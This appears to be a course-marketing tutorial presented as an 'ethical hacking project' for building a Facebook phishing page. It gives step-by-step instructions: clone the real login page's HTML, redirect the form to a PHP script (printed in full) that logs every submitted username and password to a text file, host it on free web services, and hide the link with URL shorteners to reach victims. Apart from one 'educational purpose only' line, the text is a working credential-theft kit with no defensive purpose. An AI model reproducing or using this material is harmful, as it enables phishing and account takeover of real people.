If you are from a computer science background, you might have come across this phrase “phishing”. Phishing is an act of acquiring information such as bank card details, username, passwords, etc. from an individual illegally. In this ethical hacking project, we will create a phishing page of Facebook to acquire the username and login credentials of the victim. This project is for educational purpose only don’t misuse.
Following are the target areas where the phishing attack is performed - social networking sites, online payment sites, banking sites, online shopping sites, etc. This phishing technique is carried by sending a link to the victim via email or messaging applications.
Ethical Hacking Kit will be shipped to you and you can learn and build using tutorials. You can start for free today!
Now imagine that you are the victim. You are getting a phishing scam link via mail the mail ID also looks genuine similar to the mails from banks or shopping sites. Mostly phishing links will redirect to a site which looks similar to the original site. As you try to log in to the site using your login credential the hacker get your details and will access your account illegally.
Following are the different types of phishing:
Want to develop practical skills on Ethical Hacking? Checkout our latest projects and start learning for free
Project Implementation:
Following are the procedures to create a phishing web page of Facebook:
The first step is to download the HTML code of Facebook login page. For that, go to facebook.com right-click > view source page. Copy-paste the entire code into notepad.
Now find and replace the following line inside the quotations “https://www.facebook.com/login.php?login_attempt=1” to “post.php”. Then save the file by naming it as index.html.
Next, we will create a PHP file to fetch the password for that create a new notepad file and paste the following code it and save it as post.php.
<?php
header (‘Location:http://www.facebook.com/’);
$handle = fopen(“usernames.txt”, “a”);
foreach($_POST as $variable => $value)
{
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “rn”);
}
fwrite($handle, “rn”);
fclose($handle);
exit;
?>
The above code takes the username and password then saves it in a separate .txt file.
The phishing webpage is now ready to upload. You can use free web hosting services like Freehosting.com, Hostinger.com, 000webhost.com, Freehostia.com, InfinityFree.net, etc.
Create an account from the above mentioned free Webhosting sites. Navigate to the file manager and delete the default files then upload the two files which you have created.
Now you can use the URL of that page to collect the sensitive information from the victims. Mostly phishers use URL shorteners to make the link look similar to the original links.
Skyfi Labs helps students learn practical skills by building real-world projects.
You can enrol with friends and receive kits at your doorstep
You can learn from experts, build working projects, showcase skills to the world and grab the best jobs.
Get started today!
Join 250,000+ students from 36+ countries & develop practical skills by building projects
Get kits shipped in 24 hours. Build using online tutorials.
Stay up-to-date and build projects on latest technologies